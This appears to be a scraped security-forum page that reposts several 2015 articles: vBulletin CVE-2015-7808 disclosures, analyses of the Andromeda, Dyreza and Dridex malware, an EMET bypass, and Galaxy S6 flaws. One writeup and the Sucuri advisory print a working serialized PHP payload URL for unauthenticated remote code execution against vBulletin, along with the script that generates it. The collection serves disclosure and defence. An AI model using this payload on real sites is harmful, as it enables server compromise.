Nytro

Check Point Discovers Critical vBulletin 0-Day by Check Point Research Team posted 2015/11/05 vBulletin is a commercial forum and blog platform developed by vBulletin Solutions, Inc. It was created over 10 years ago and is written in PHP. It is the world’s most popular forum platform, powering ~78% out of the forums in the top 100K web-sites. Currently there are estimated to be over 40,000 live sites using vBulletin. A month ago, Check Point privately reported a critical unauthenticated RCE vulnerability to vBulletin support. This vulnerability was independently discovered by Netanel Rubin, and assigned CVE-2015-7808. When exploited, the vulnerability allows an attacker to execute PHP code on any vBulletin server without requiring user authentication. It does not require any themes or modules other than the ones installed by default. As widely reported, the main vBulletin.org forum was compromised earlier this week and an exploit for a vBulletin 0-day was up for sale in online markets. A patch later released by vBulletin fixes the vulnerability reported, but fails to neither credit any reporting nor mention the appropriate CVE number. As the vulnerability is now fixed and an exploit exists in the wild with public analyses, we follow with the technical description as submitted to vBulletin. If you administer any vBulletin web site, we urge you to apply the patch as soon as possible, as exploitation risk is imminent. It is important to note the analyzed public exploit shows a different chain than the one we used for our PoC; therefore we cannot link the attacks directly to our report. Disclosure Timeline [TABLE=width: 734] [TR] [TD=width: 84]Oct 4 2015[/TD] [TD=width: 554]First contact with vBulletin[/TD] [/TR] [TR] [TD=width: 84]Oct 5 2015[/TD] [TD=width: 554]First response received, asked for PGP key to securely transfer report[/TD] [/TR] [TR] [TD=width: 84]Oct 6 2015[/TD] [TD=width: 554]PGP request denied: “I will hide the response so it’s not publicly available”[/TD] [/TR] [TR] [TD=width: 84]Oct 10 2015[/TD] [TD=width: 554]Sent complete report unencrypted as attached PDF[/TD] [/TR] [TR] [TD=width: 84]Oct 11 2015[/TD] [TD=width: 554]“We cannot accept attachments in our ticket system – please upload this to your server and provide a link to download this.”[/TD] [/TR] [TR] [TD=width: 84]Oct 11 2015[/TD] [TD=width: 554]Uploaded report to a public server and sent a link. Updated with CVE-2015-7808 assignment.[/TD] [/TR] [TR] [TD=width: 84]Oct 14 2015[/TD] [TD=width: 554]Asked vBulletin for confirmation/update[/TD] [/TR] [TR] [TD=width: 84]Oct 14 2015[/TD] [TD=width: 554]“We’re still working to establish the issues and identify any fixes that may be required.”[/TD] [/TR] [TR] [TD=width: 84]Oct 27 2015[/TD] [TD=width: 554]Asked vBulletin for confirmation/update[/TD] [/TR] [TR] [TD=width: 84]Oct 27 2015[/TD] [TD=width: 554]“We’re still working to establish the issues and identify any fixes that may be required.”[/TD] [/TR] [TR] [TD=width: 84]Nov 2 2015[/TD] [TD=width: 554]Patch released by vBulletin[/TD] [/TR] [TR] [TD=width: 84]Nov 5 2015[/TD] [TD=width: 554]Public disclosure[/TD] [/TR] [/TABLE] Technical Description vBulletin handles a lot of the heavy lifting through an internal API. Unfortunately parts of that API are also used as a gate for Ajax requests, and as a result this API is also accessible through the regular CGI. This API does not validate the origin of the request, allowing us to access any part of its interface. That interface, in fact, allows us to call any public method in any class that inherits from ‘vB_Api’ and located in ‘/core/vb/api/’. This folder contains dozens of classes and hundreds of methods for us to use as an attack surface, and as noted, some of them considered internal methods. Moreover, we can call these methods with any arguments we’d like, as the API doesn’t have any sort of argument white listing. Our findings begin with the vulnerable method ‘vB_Api_Hook:: decodeArguments()’, which, again, requires no authentication, and at its first line of code contains an ‘unserialize’ call. This can be seen in the following code: Because we control the ‘$arguments’ parameter we can also control what goes into the ‘unserialize()’ call. That means we can actually craft and inject any object we’d like into the ‘$args’ variable. PHP objects share several ‘magic methods’ that get called automatically whenever specific events occur. Such a trigger event, for example, is the destruction of an object (the ‘__destruct()’ method gets called), or an attempt to use an object as a string, triggering its ‘__toString()’ method. That means we can now trigger a call to any ‘__destruct()’ method for any defined class. We only set our object to be of that type, and when the ‘decodeArguments()’ function returns, that object will get destructed. Examine the following interesting destructor for vB_vURL: This method takes the ‘tmpfile’ property and treats it as a file name that, if exists, gets deleted. This can obviously be exploited to remove any file accessible to the web server, most likely rendering the server inoperable, or even causing permanent data loss. However, we are after higher goals. We can leverage this code to gain more access to protected methods in objects. If we insert another object into ‘tmpfile’, an attempt to convert it into a string will happen once the ‘file_exists()’ call is reached. In effect, this now added all ‘__toString()’ methods to our widening attacking surface. Take a look at vB_View’s ‘__toString()’: This ‘__toString()’ make a call to vB_View’s ‘render()’ method right off the bat. Unfortunately, this base ‘render()’ method doesn’t do anything of interest for our exploitation purposes. Consider, however, the ‘vB_View_AJAXHTML’ class, inheriting from vB_View, and implementing a very different ‘render()’ method: As seen above, this ‘render()’ calls another ‘render()’, for the object under the ‘content’ property. Since we can control that one, too, we can now target our ‘render()’ call at any class (not only vB_View objects). This leads us to the ‘vB5_Template’ class, which implements its own ‘render()’ method: Basically, this method loads a template from the cache or DB using the template name specified in the ‘template’ property. Afterwards, it evals or includes it based on the template type. Because the template name is only used inside a (properly escaped) SQL query, we can’t use it for a LFI attempt. Still, this allows us to load any template we want from the DB. Let’s look at the ‘widget_php’ template code: The ‘code’ value in the ‘$widgetConfig’ dictionary is the argument for a function which (ultimately) evals its content. If we could control this variable, we would be able to execute any PHP code we’d like on the server. Let’s see how we do exactly that. The ‘render()’ method at the ‘vB5_Template’ class call the ‘extract()’ function with the ‘$this->registered’ as an argument. As some readers may observe, ’extract()’ receives a key-value dictionary as an argument and adds the key-value pairs as variables and respective values to the current scope. Because we control ‘$this->registered’, we can add any variable and value to the current scope. Finally, we add the ‘$widgetConfig’ variable to the ‘registered’ property, set its value as a dictionary containing ‘code’ as a key and our exploit PHP code as its value. POC Sursa: http://blog.checkpoint.com/2015/11/05/check-point-discovers-critical-vbulletin-0-day/

Revisiting the latest version of Andromeda/Gamarue Malware 2015/11/05 / Blueliv Andromeda/Gamarue malware has been prevalent since it came into limelight a couple of years ago. Also, the author keeps it well updated ever since. With respect to its earlier avatars, it has gone through several changes from anti-analysis to a change in protocol format. Some excellent write-ups have already been made on it [1][2] previously, but in this blog we will revisit and analyze the latest version.Andromeda-Gamarue hides itself though many layers and its default one.Since its inception it has made use of many techniques to defeat extraction of embedded configuration (url, keys, etc.), such as using a fake encryption, fake urls, config encryption and many more.Meanwhile we also found a sample which had obfuscation techniques such as opaque predicates to hinder static-analysis. Andromeda-Gamarue consists of two payloads, a default unpacker and a main payload. We are going to cover up both in this post.It starts with loading up some of the native functions identified by hashes using a simple hashing algorithm and stores the API address in stack variables. To get a basic overview of the binary we will generate a run time dynamic call graph to help us understand the functionality to some extent. It shows some calls to LdrProcessRelocateBlock(), which gives us an indication about where and how the payload is unpacked. The binary consist of a data blob in the .rdata section of a PE file which holds information regarding the unpacked payload. It has the following structure: The integrity of the payload is checked against a hard coded crc32 hash value and, if the hash is verified, it further proceeds to decrypt and decompress the payload using a 16 byte rc4 key and APLIB decompression. This chunk is copied to an allocated heap region which is purposely created by using MEM_COMMIT or MEM_TOP_DOWN, which might be used to bypass some scanning engine or dumpers. The base relocations are applied on that memory region using the RelocationTableOffset field. Another block of executable memory region of size 1000h is allocated, which will later on be used for copying stolen API code. Then, Dll and Imports are parsed. Dll names can again be found as hashes.The first instruction is copied from an API location to this particular memory region and a succeeding jump is placed after that to the original instructions. This is done to bypass API hooking. It consists of an x86 instruction parsing subroutine. Subroutine calls and unconditional jumps follow, subsequent instructions are copied and a jump to OEP is made. MAIN PAYLOAD The main payload consists of an installer and a primary payload responsible for communicating to the command and control centre. Let’s take a look to the call graph of the installer part: It starts by getting serial number for the root drive (which will later on be used as a part in the c2 request). It also has a function to check for the presence of certain processes and if they are found it goes in an infinite loop. These checks are bypassed if a registry key “is_not_vm” is found in HEY_LOCAL_MACHINE software\\policies. The key has to be equal to VolumeSerialNumber. An environment variable is created from xoring VolumeSerialNumber with 0x737263, which is assigned to the module file name. This environment variable acts as an indicator for the previous instance of binary. It also sets up an event named after xoring VolumeSerialNumber xoring with 0x696E6A63. This payload is injected inside “msiexec.exe” by changing the entry point to push <base of injected code> ret and waits for the event to be triggered by the main payload.The main payload nulls the packer PE headers and sections. Following this, it adjusts the privileges, sets TaskbarNoNotification, and disables UAC, Windows Action centre, as well as some security related services (only if the “bb” parameter is not set). Explained below: If necessary privileges are not found, it will try to elevate the privileges by using the “Runas” verb. C2 servers are encrypted and stored using a crc32 hash of PE data and an incremental XOR value.After that, it makes connection to each c2 with the following json request:{“id”:%lu,”bid”:%lu,”os”:%lu,”la”:%lu,”rg”:%lu,”bb”:%lu}ID = VolumeSerialNumberBID = botnetIDOS = OSVersionLA = Local IP addressRG = isprivileged?BB = islocalized (Russia, Ukraine, Belarus and Kazakhstan)This request is encrypted using a 32 bytes rc4 key and the response is also decrypted using the same rc4 key (earlier versions would have used 4 bytes ID as a response key). The request also comes in a JSON format now. It consists of a json parser compiled from https://github.com/udp/json-parser/.The return value from jsonparser is represented this way: The above JSON structure is expressed in the following format:[next_request_sleeptime (minutes) ,{Unimplemented_object}, [TaskID, RequestType, ‘URL’-N/A ]……]The first item in the array is the next request sleep time. It is the time frame in minutes when next iteration of calling c2 is performed.The second in the list is an unimplemented / unused type. When this object is found, it is simply skipped.The rest are single or multiple arrays which may consist of a url payload. TaskID is the UID of a task provided by the c2 server. This ID is sent back in a following request. The request type is an identifier of the task type of an eg download url, plugin download or delete bot. These urls can either be exe or plugins. Plugins are encrypted and compressed with RC4 and APlib. After completing the specified task, another request is sent back to the c2 server which has the following format:{“id”:%lu,”tid”:%lu,”err”:%lu,”w32?:%lu}ID: VolumeSerialNumberTID: TaskIDERR: Error Level on task completion (0 – no error starting from 0x10)W32: Error Number from GetLastError() Raashid Bhat Malware Analyst Sursa: https://www.blueliv.com/research/revisiting-the-latest-version-of-andromedagamarue-malware/

vBulletin 5 PreAuth RCE writeupby @_cutz As came to my attention a guy named Coldzer0 is selling a vBulletin RCE expoit on http://0day.today. In his video he exploited several vBulletin boards while surfing on Google... This ended in the vBulletin main forum being pwned on monday (11/02/15). vBulletin implements certain ajax API calls in /core/vb/api/, one of them is hook.php: public function decodeArguments($arguments) { if ($args = @Unserialize($arguments)) { $result = ''; foreach ($args AS $varname => $value) { $result .= $varname; Apart from the obvious unserialize() not much else happening there -- luckily we have in /core/vb/db/result.php: class vB_dB_Result implements Iterator { ... public function rewind() { //no need to rerun the query if we are at the beginning of the recordset. if ($this->bof) { return; } if ($this->recordset) { $this->db->free_result($this->recordset); } rewind() is the first function to get called when an Iterator object is accessed via foreach(). Then we have in /core/vb/database.php: abstract class vB_Database { ... function free_result($queryresult) { $this->sql = ''; return @$this->functions['free_result']($queryresult); } Which gives easy RCE. Setup objects accordingly: $ php << 'eof' <?php class vB_Database { public $functions = array(); public function __construct() { $this->functions['free_result'] = 'phpinfo'; } } class vB_dB_Result { protected $db; protected $recordset; public function __construct() { $this->db = new vB_Database(); $this->recordset = 1; } } print urlencode(serialize(new vB_dB_Result())) . "\n"; eof O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2A%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2A%00recordset%22%3Bi%3A1%3B%7D Just surf to: [url]http://localhost/vbforum/ajax/api/hook/decodeArguments?arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22%3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22%3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D[/url] The fix was just replacing the unserialize() with json_decode(). Btw this bug has been sitting in vBulletin for more than three years. -- cutz Sursa: Private Paste - Pastie

Windows Subsystem Used to Bypass Microsoft EMET By Eduard Kovacs on November 03, 2015 Researchers have once again managed to bypass Microsoft’s Enhanced Mitigation Experience Toolkit (EMET), this time by leveraging the Windows subsystem WoW64. WoW64 (Windows 32-bit on Windows 64-bit) is a compatibility layer in Windows designed to allow unmodified 32-bit applications to run on 64-bit systems. While it’s very useful, researchers demonstrated in the past that WoW creates an attack surface that can be used by malicious actors to bypass antivirus software and exploit mitigations. Researchers at two-factor authentication (2FA) solutions provider Duo Security have found a way to use WoW64 to bypass Microsoft EMET, a tool designed to make it more difficult and more expensive for attackers to exploit a system. While EMET bypass methods have been presented several times in the past, Duo Security says its method can be used to bypass all payload execution and return-oriented programming (ROP) mitigations in one shot, in a generic, app-independent way. According to Duo Security, 80 percent of browsers are 32-bit processes running under WoW64 on a 64-bit system. This is relevant in this case as web browser exploitation is one of the most common vectors used by malicious actors to breach systems. In order to demonstrate their findings, researchers modified an existing exploit for a use-after-free vulnerability in Adobe Flash Player (CVE-2015-0311). They successfully reproduced the bypass on a 64-bit version of Windows 7 running Internet Explorer 10 and the latest versions of EMET, 5.2 and 5.5 beta. “While EMET provides support for both 32 and 64-bit processes, as a limitation of its design, it does not explicitly handle the special case of WoW64 processes. This makes using a 64-bit ROP chain and secondary stage a relatively straightforward method for bypassing a significant number of EMET’s mitigations,” Duo Security explained in its research paper. “Furthermore, 64-bit editions of EMET do not support any of the ROP-related mitigations, further limiting EMET’s effectiveness on 64-bit processes. It appears that due to these limitations, enhancing EMET to overcome them is likely a non-trivial effort.” Darren Kemp, researcher at Duo Security, has pointed out that the paper’s goal is not to undermine the importance of EMET’s role in defending organizations against cyberattacks, but to highlight shortcomings in the current version. “EMET is largely effective at complicating a variety of exploitation techniques in true 32- and 64-bit applications, often requiring attackers to find a solution to each mitigation on a case- by-case basis. Most off-the-shelf exploits will fail in the face of EMET mitigations,” Duo Security said. “But due to the architectural quirks of the WoW64 subsystem, mitigations provided by EMET are significantly less effective due to the way they are inserted into the process. Fixing this issue requires significant modifications to how EMET works.” Microsoft has provided the following statement: We continue to research new mitigations to integrate into the Enhanced Mitigation Experience Toolkit (EMET). Deploying EMET helps make it more difficult for attackers to exploit a system, which moves the balance of power in the customer’s favor. Sursa: http://www.securityweek.com/windows-subsystem-used-bypass-microsoft-emet

A Technical Look At Dyreza In a previous post we presented unpacking 2 payloads delivered in a spam campaign. A malicious duet – Upatre(malware downloader) and Dyreza (credential stealer). In this post we will take a look at the core of Dyreza – and techniques that it uses. Note, that Dyreza is a complex piece of malware and various samples come with various techniques – however, the main features remain common. Analyzed samples ff3d706015b7b142ee0a8f0ad7ea2911 – Dyreza executable- a persistent botnet agent, carring DLLs with the core malicious activities 5a0e393031eb2accc914c1c832993d0b – Dyreza DLL (32bit) 91b62d1380b73baea53a50d02c88a5c6 – Dyreza DLL (64 bit) Behavioral analysis When Dyreza starts to infect the computer – it spreads like fire. Observing it in Process Explorer, we can see many new processes appearing and disappearing. As we can notice, it deploys explorer, svchost, taskeng, loads some DLL via dllhost… All this is done in order to obfuscate the flow of execution, in hopes of confusing analyst. 2 copies of the malicious file are dropped – in C:\Windows and %APPDATA% – under pseudo-random names, matching the regex: [a-zA-Z]{15}.exe , i.e vfHNLkMCYaxBGFy.exe That persistence is achieved by adding a new task in the task scheduler – it deploys the malicious sample after every minute, to ensure that it keeps running. Code injected into other processes (svchost, explorer) communicates with the C&C: When we deploy any web browser, it directly injects the code into its process and deploys illegitimate connections.It is the way to keep in touch with the C&C, monitor user’s activity and steal credentials. We can also see SQLite files (etilqs_*) created in a TEMP folder that are serving as a small database, where Dyreza stores information. Collected data are stored in a dedicated folder before they are sent to the C&C: Inside the code Main executable Dyreza doesn’t start on a machine that has less than 2 processors. This technique is used as a defense, preventing file from running on VM. It is based on the observation that VM usually have only one processor – in contrast to most physical machines used nowadays. It is implemented by checking appropriate field in PEB (Process Environment Block), that is pointed by FS:[30]. Infection continues only if the condition is satisfied. At the beginning of execution, malware loads additional import table into a newly allocated memory page. Names of modules and functions are decrypted at runtime. It checks, if it is deployed under debugger – using function LookupPrivilegeValue with argument SeDebugPrivilege – if it returns non-zero value, execution is terminated. Valid execution follows few alternative paths. Decision, by which path of to follow is made based on the initial conditions – like, executable path and arguments with which the program was run. When it is deployed for the first time (from a random location), it make its own copy into C:\Windows and %APPDATA% and deploy the copy as a new process. As an argument to a deployed copy (from C:\Windows) it passes a path to the other copy. If it is deployed from the valid path and the initial argument passed validation, it performs another check – verifying if it is deployed for the first time. It is achieved by creating a specific Global (it’s name is a hash of Computer name and OS Version – fetched by functions: GetComputerName, RtlGetVersion). If this condition is also satisfied and mutex already exist, then it follows the main path, deploying the malicious code. First, the encrypted data and the key are loaded from the executable’s resources. T1RY615NR – encrypted 32 bit code, UZGN53WMY – the key, YS45H26GT – encrypted 64bit code Unpacking: The unpacking algorithm is pretty simple – key_data contains values and data – list of indexes of the values inkey_data. We process the list of indexes and read the corresponding values: def decode(data, key_data): decoded = bytearray() for i in range(0, len(data)): val_index = data decoded.append(key_data[val_index]) return decoded This script decrypts dumped resources: https://github.com/hasherezade/malware_analysis/blob/master/dyreza/dyreza_decoder.py The revealed content contains a shellcode to be injected and a a DLL with malicious functions (32 or 64 bit appropriately). The main sample chooses which one to unpack and deploy, by checking if it is running via WOW64 (emulation for 32 bit on 64 bit machine) – calling function IsWow64Process. Malicious DLL (core) At this stage, functionality of the malware becomes pretty clear. The DLL does not contain much obfuscation – it has clear strings and a typical import table. We can see the strings that are used for communication with the C&C: Both – 32 and 64 bit DLLs have analogical functionality. Only architecture-related elements and strings are different. The agent identifies the system and sends the information to the C&C: Similar procedure is present in the 64 bit version of the DLL, only the hardcoded string “_32bit” is substituted by “_64bit”: Also, network settings are examined (to verify and inform the C&C whether the client can establish back connection – command : AUTOBACKCONN) It injects its modules in following browsers: Below – attempt to send stolen account credentials: In addition to monitoring browsers, it also collects general information about the computer (it’s configuration, existing users) – in form of a report: The malware not only steal information and sniff user’s browsing, but also tries to take a full control over the system – executes various shell commands – system shutdown,etc. Some examples below: Trying to add a user with administrative privileges Shutdown system on command (AUTOKILLOS) C&Cs This botnet is prepared with great care. Not only communication is encrypted, but also many countermeasures have been taken in order to prevent detection. First of all, the address of the C&C is randomly picked from a hard-coded pool.This pool is stored in one of the resources of Dyreza DLL (AES encrypted). Below, we can see how it gets decrypted, during execution of the payload: (A script for decrypting list of C&Cs from dumped resources is available here:https://github.com/hasherezade/malware_analysis/blob/master/dyreza/dyrezadll_decoder.py) Also, the certificate served by a particular C&C changes on each connection. The infrastructure is built on the network of compromised WiFi routers (most often: AirOS, MicroTik). The server receives encrypted connection on port 443 (standard HTTPS) or 4443 (in case if standard HTTPS port of a particular router is occupied by a legitimate service). Conclusion Dyreza is an eclectic malware, developed by professionals. It is clear that they are constantly working on a quality – each new version carries some new ideas and improvements, making analysis harder. Appendix Very good Dyreza/Upare tracker: https://techhelplist.com/maltlqr/ – by @Techhelplistcom (list of C&Cs from the current sample: https://techhelplist.com/maltlqr/reports/01oct-20oct-status.txt ) Scripts used in this post: https://github.com/hasherezade/malware_analysis/tree/master/dyreza Sursa: https://blog.malwarebytes.org/intelligence/2015/11/a-technical-look-at-dyreza/

Analysis Of An Office Maldoc With Encrypted Payload (Quick And Dirty) Didier Stevens @ 0:00 The malicious office document we’re analyzing is a downloader: 0e73d64fbdf6c87935c0cff9e65fa3be oledump reveals VBA macros in the document, but the plugins are not able to extract a URL: Let’s use a new plugin that I wrote: plugin_vba_dco. This plugin searches for Declare statements and CreateObject calls: In the first half of the output (1) we see all lines containing the Declare or CreateObject keyword. In the second half of the output (2) we see all lines containing calls to declared functions or created objects. Although the code is obfuscated (obfuscation of strings and variable names), the output of this plugin allows us to guess that Ci8J27hf2 is probably a XMLHTTP object, because of the .Open, .send, .Status, … methods and properties. The Open method of the XMLHTTP object takes 3 parameters: the HTTP method, the URL and a boolean (asynchronous or synchronous call): As we can see, the third parameter is False and the first 2 parameters are the return value of a function called IpkfHKQ2Sd. This function takes 2 parameters: 2 strings. The first string is the result of concatenated Chr functions, and the second string is a literal string. Since the Open method requires the HTTP method and URL as strings, is very likely that function IpkfHKQ2Sd is a decoding function that takes 2 strings as input (meaningless to us) and returns a meaningful string. Here is the original IpkfHKQ2Sd function. It’s heavily obfuscated: Here is the same function that I deobfuscated. I didn’t change the function name, but I removed all useless code, renamed variables and added indentation: We can now see that this function uses a key (sKey) and XOR operations to decode a secret string (sSecret). And now we can also see that this is just a string manipulation function. It does not contain malicious or dangerous statements or function calls. So it is safe to use in a VBA interpreter, we don’t need to translate it into another language like Python. We are going to use this deobfuscated function in a new spreadsheet to decode the URL parameter: In the VBA editor of this new spreadsheet, we have the deobfuscated IpkfHKQ2Sd function and a test subroutine that calls the IpkfHKQ2Sd function with strings that we found in the .Open method for the URL argument. The decoded string returned by function IpkfHKQ2Sd is displayed via MsgBox. Executing this test subroutine reveals the URL: Downloading this file, we see it’s not a JPEG file, but contrary to what we could expect, it’s neither an EXE file: Searching for .responseBody in the VBA code, we see that the downloaded file (present in .responseBody) is passed as an argument to function IpkfHKQ2Sd: This means that the downloaded file is also encoded. It needs to be decoded with the same function as we used for the URL: function IpkfHKQ2Sd (but with another key). To convert this file with the deobfuscated function in our spreadsheet, we need to load the file in the spreadsheet, decode it, and save the decoded file to disk. This can be done with myFileContainer.xls tool (to be released). First we load the encoded file in the FileContainer: FileContainer supports file conversion: we have to use command C and push the Process Files button: Here is the default conversion function Convert. This default function doesn’t change the file: the output is equal to the input: To decode the file, we need to update the Convert function to call the decoding function IpkfHKQ2Sd with the right key. Like this: And then, when we convert the file, we obtain an EXE file: This EXE turns out to be Dridex malware: 50E3407557500FCD0D81BB6E3B026404 Remark: reusing code from malware is dangerous unless we know exactly what the code does. To decode the downloaded file quickly, we reused the decoding VBA function IpkfHKQ2Sd (I did not translate it into another language like Python). But to be sure it was not malicious, I deobfuscated it first. The deobfuscation process gave me the opportunity to look at each individual statement, thereby giving me insight into the code and come to the conclusion that this function is not dangerous. We could also have used the obfuscated function, but then we ran the risk that malware would execute because we did not fully understand what the obfuscated function did. Translating the obfuscating function to another language doesn’t make it less dangerous, but it allows us to execute it in a non-Windows environment (like Linux), thereby preventing Windows malware from executing. Sursa: Analysis Of An Office Maldoc With Encrypted Payload (Quick And Dirty) | Didier Stevens

By Daniel Cid on November 4, 2015 The vBulletin team patched a serious object injection vulnerability yesterday, that can lead to full command execution on any site running on an out-of-date vBulletin version. The patch supports the latest versions, from 5.1.4 to 5.1.9. The vulnerability is serious and easy to exploit; it was used to hack and deface the main vBulletin.com website. As a precaution, all passwords were reset; you will have to create a new one before you can access vbulletin.com again and download the patches. Exploits in the Wild This vulnerability seems to have been around for a bit. We were able to trace exploit attempts to the end of October, they were targeting a few high profile vBulletin sites protected by our Website Firewall. The exploit was shared publicly yesterday. It attacks the decodeArguments Ajax API hook. Here is an example of an exploit attempt in the wild: 108.47.xx.yy – – [02/Nov/2015:22:18:21 -0500] “GET /vbforum[/]ajax/api/hook/decodeArguments? arguments=O%3A12%3A%22vB_dB_Result%22%3A2%3A%7Bs%3A5%3A%22%00%2a%00 db%22%3BO%3A11%3A%22vB_Database%22%3A1%3A%7Bs%3A9%3A%22functions%22 %3Ba%3A1%3A%7Bs%3A11%3A%22free_result%22%3Bs%3A7%3A%22phpinfo%22 %3B%7D%7Ds%3A12%3A%22%00%2a%00recordset%22%3Bi%3A1%3B%7D%22 Once decoded, it executes: vB_Database”:1:{s:9:”functions”;a:1:{s:11:”free_result”;s:7:”phpinfo”;}}s:12:” This shows the attacker the result of phpinfo indicating that his exploit succeeded. If this test payload works, the attacker will proceed with a full compromise. We are not seeing widespread exploitation attempts yet, as just a few high profile sites were targeted, but we expect it to change soon as it makes its way into the automation engines. Patch and Protect If we have not emphasized before, you have to patch your vBulletin site now! Websites behind ourWAF are (and always were) protected against this vulnerability due to our virtual hardening technology. If you can not patch your vBulletin site, we recommend looking at a solution to stop these exploits before they reach you. Sursa: https://blog.sucuri.net/2015/11/vbulletin-exploits-in-the-wild.html

Nu e, doar Bucuresti.

Google Researchers Find Serious Flaws in Galaxy S6 Edge By Eduard Kovacs on November 03, 2015 Researchers from Google’s Project Zero have identified nearly a dozen high severity vulnerabilities in the Android operating system running on Samsung Galaxy S6 Edge smartphones. While Google is the main developer of Android, device manufacturers such as Samsung, LG, HTC and Huawei have been using the Android Open Source Project (AOSP) source code to create their own variations of the mobile operating system. Project Zero wanted to put the security of an OEM device to the test to see how it compares against Google’s Nexus, for which the Internet giant has started releasing monthly security updates. “OEMs are an important area for Android security research, as they introduce additional (and possibly vulnerable) code into Android devices at all privilege levels, and they decide the frequency of the security updates that they provide for their devices to carriers,” Project Zero researcher Natalie Silvanovich said in a blog post. Ten researchers, members of Project Zero and other Google security teams, were tasked with finding vulnerabilities in Samsung’s Galaxy S6 Edge smartphone, which they claim to have chosen because it's a high-end device with a large number of users. They specifically looked for three types of issues that can be part of a kernel privilege escalation exploit chain, including gaining remote access to contacts, photos and messages, gaining access to such data from a Google Play application that requires no permissions, and using this access to persistently execute code even after a device wipe. A total of eleven high severity issues have been identified, the most serious being a path traversal vulnerability (CVE-2015-7888) in the Samsung WifiHs20UtilityService service that can be exploited to write arbitrary files on the system. The email client installed on Samsung Galaxy S6 Edge devices is also plagued by a serious flaw (CVE-2015-7889), which allows an attacker to forward a user’s emails to a different account via a series of intents from an unprivileged application. Another email client issue (CVE-2015-7893) can be exploited to execute arbitrary JavaScript code embedded in a message. Google researchers also found issues related to drivers (CVE-2015-7890, CVE-2015-7891, CVE-2015-7892), and image parsing (CVE-2015-7894, CVE-2015-7895, CVE-2015-7896, CVE-2015-7897, CVE-2015-7898). “Overall, we found a substantial number of high-severity issues, though there were some effective security measures on the device which slowed us down. The weak areas seemed to be device drivers and media processing. We found issues very quickly in these areas through fuzzing and code review. It was also surprising that we found the three logic issues that are trivial to exploit. These types of issues are especially concerning, as the time to find, exploit and use the issue is very short,” Silvanovich explained. The expert pointed out that while SELinux (Security-Enhanced Linux) provides significant protection, some of the bugs they have identified can be exploited to disable this kernel security module. Project Zero reported the vulnerabilities to Samsung in late July and eight of them were addressed by the vendor with its October maintenance release. The remaining three security bugs will be resolved later this month, but researchers say the unpatched issues have a lower severity. After the existence of the critical Stagefright vulnerabilities came to light this summer,Samsung, LG and other phone manufacturers announced their plans to release monthly security updates designed to patch Android vulnerabilities. But not all vendors rushed to make such commitments. HTC said it will push for monthly security updates, but the company has deemed monthly update guarantees “unrealistic.” Sursa: http://www.securityweek.com/google-researchers-find-serious-flaws-galaxy-s6-edge

Daca cineva e familiar cu unul dintre aceste limbaje si doreste sa invete mai multe si sa lucreze, sa imi dea un PM pentru mai multe informatii. Nu am mai multe detalii, dar daca sunteti interesati va pot pune in legatura cu o persoana de la firma respectiva.

There are plenty of tools for behavioral malware analysis. The defacto standard ones, though, are Sysinternals’s Process Monitor (also known as Procmon) and PCAP generating network sniffers like Windump, Tcpdump, Wireshark, and the like. These “two” tools cover almost everything a malware analyst might be interested in when doing behavioral malware analysis.But there’s a major problem with these tools. Any of them works in a so to say separated or isolated way, not knowing anything from each other. Hence it’s kinda hard to get accordingly recorded activities together in one piece or picture. That’s where ProcDOT enters the stage. It fills this actual gap by merging those records together. But ProcDOT does much more. It turns those thousands of monitored activities into a big behavioral picture - actually a graph - which can be interactively explored making behavioral malware analysis as efficient as you it never was before.In this terms ProcDOT enables you to ... •Get an overall guts feeling for an entire situation within a glance, •Spot relevant parts and understand the correlation between them in minutes Sursa: ProcDOT's Home

DensityScout This tool calculates density (like entropy) for files of any file-system-path to finally output an accordingly descending ordered list. This makes it possible to quickly find (even unknown) malware on a potentially infected Microsoft Windows driven machine. Download latest Windows version Download latest Linux version Author Christian Wojner Language English License ISCL [TABLE] [TR] [TD]Releases [/TD] [TD]Changes [/TD] [TD=align: center][/TD] [TD=align: center][/TD] [TD=align: center][/TD] [/TR] [TR] [TD]Build 43[/TD] [TD]Important bugfixes[/TD] [TD=align: center][/TD] [TD=align: center][/TD] [TD=align: center]x[/TD] [/TR] [TR] [TD]Build 42[/TD] [TD]-[/TD] [TD=align: center][/TD] [TD=align: center][/TD] [TD=align: center]x[/TD] [/TR] [/TABLE] Description DensityScout is a tool that has been written for one purpose: finding (possibly unknown) malware on a potentially infected system. Therefore it takes advantage of the typical approach of malware authors to protect their "products" with obfuscation like run-time-packing and -encryption. The tool itself is based on the concept of our Bytehist tool, btw. So what does DensityScout do? DensityScout's main focus is to scan a desired file-system-path by calculating the density of each file to finally print out an accordingly descending list. Usually most Microsoft Windows executables are not packed or encrypted in any way which throws the hits of malicious executables to the top of the list where one can easily focus on. What's Density? Density can also be understood as "entropy". However, the algorithm behind density is not 100% equal to the one which entropy is based on. So we decided to choose a different name. Further thinking ... DensityScout isn't only good for finding malicious executables - it can also be used to find packed or encrypted data-containers and the like! Be aware! For the ones that are already aware of our investigations regarding "The WOW Effect" be warned on doing live-forensics and analysis on 64-Bit Microsoft Windows systems using the 32-Bit version of DensityScout (or/and any other 32-Bit based tool). Use the 64-Bit version instead! The ones of you who do not know what this means exactly, please do read our according paper. Sursa: https://cert.at/downloads/software/densityscout_en.html

